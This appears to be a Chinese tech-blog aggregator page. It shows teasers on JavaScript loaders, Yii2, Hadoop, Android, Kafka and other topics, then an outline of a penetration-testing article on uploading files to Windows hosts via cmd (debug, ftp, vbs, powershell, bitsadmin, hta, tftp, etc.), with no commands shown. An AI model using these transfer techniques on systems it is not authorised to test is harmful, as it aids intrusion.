LABjs 的核心是 LAB（Loading and Blocking）：Loading 指异步并行加载，Blocking 是指同步等待执行。LABjs 通过优雅的语法（script 和 wait）实现了这两大特性，核心价值是性能优化。LABjs 是一个文件加载器。RequireJS 和 SeaJS 则是模块加载器，倡导的是一种模块化开发理念，核心价值是让 JavaScript 的模块化开发变得更
[应用结构]入口脚本 dcj3sjt126com PHP yii2
入口脚本入口脚本是应用启动流程中的第一环，一个应用（不管是网页应用还是控制台应用）只有一个入口脚本。终端用户的请求通过入口脚本实例化应用并将将请求转发到应用。 Web 应用的入口脚本必须放在终端用户能够访问的目录下，通常命名为 index.php，也可以使用 Web 服务器能定位到的其他名称。控制台应用的入口脚本一般在应用根目录下命名为 yii（后缀为.php），该文
haoop shell命令 eksliang hadoop hadoop shell
cat chgrp chmod chown copyFromLocal copyToLocal cp du dus expunge get getmerge ls lsr mkdir movefromLocal mv put rm rmr setrep stat tail test text
MultiStateView不同的状态下显示不同的界面 gundumw100 android
只要将指定的view放在该控件里面，可以该view在不同的状态下显示不同的界面，这对ListView很有用，比如加载界面，空白界面，错误界面。而且这些见面由你指定布局，非常灵活。 PS：ListView虽然可以设置一个EmptyView，但使用起来不方便，不灵活，有点累赘。 <com.kennyc.view.MultiStateView xmlns:android=&qu
jQuery实现页面内锚点平滑跳转 ini JavaScript html jquery html5 css
平时我们做导航滚动到内容都是通过锚点来做，刷的一下就直接跳到内容了，没有一丝的滚动效果，而且 url 链接最后会有“小尾巴”，就像#keleyi，今天我就介绍一款 jquery 做的滚动的特效，既可以设置滚动速度，又可以在 url 链接上没有“小尾巴”。效果体验：http://keleyi.com/keleyi/phtml/jqtexiao/37.htmHTML文件代码： &
kafka offset迁移 kane_xie kafka
在早前的kafka版本中（0.8.0），offset是被存储在zookeeper中的。到当前版本（0.8.2）为止，kafka同时支持offset存储在zookeeper和offset manager（broker）中。从官方的说明来看，未来offset的zookeeper存储将会被弃用。因此现有的基于kafka的项目如果今后计划保持更新的话，可以考虑在合适
android > 搭建 cordova 环境 mft8899 android
1 , 安装 node.js http://nodejs.org node -v 查看版本 2, 安装 npm 可以先从 https://github.com/isaacs/npm/tags 下载源码解压到
java封装的比较器，比较是否全相同，获取不同字段名字 qifeifei
非常实用的java比较器，贴上代码： import java.util.HashSet; import java.util.List; import java.util.Set; import net.sf.json.JSONArray; import net.sf.json.JSONObject; import net.sf.json.JsonConfig; i
记录一些函数用法 .Aky. 位运算 PHP 数据库函数 IP
高手们照旧忽略。想弄个全天朝IP段数据库，找了个今天最新更新的国内所有运营商IP段，copy到文件，用文件函数，字符串函数把玩下。分割出startIp和endIp这样格式写入.txt文件，直接用phpmyadmin导入.csv文件的形式导入。（生命在于折腾，也许你们觉得我傻X，直接下载人家弄好的导入不就可以，做自己的菜鸟，让别人去说吧）当然用到了ip2long()函数把字符串转为整型数
sublime text 3 rust wudixiaotie Sublime Text
1.sublime text 3 => install package => Rust 2.cd ~/.config/sublime-text-3/Packages 3.mkdir rust 4.git clone https://github.com/sp0/rust-style 5.cd rust-style 6.cargo build --release 7.ctrl

渗透技巧——通过cmd上传文件的N种方法

渗透技巧——通过cmd上传文件的N种方法

0x00 前言

0x02 测试环境

0x03 通用上传方法

1、 debug

2、ftp

3、vbs

4、powershell

5、csc

6、JScript

7、hta

8、bitsadmin

9、base64

0x04 补充上传方法

1、wget：

2、ftfp

0x05 小结

0x06 参考资料

为您推荐了适合您的技术文章:

你可能感兴趣的:(windows,三好大神)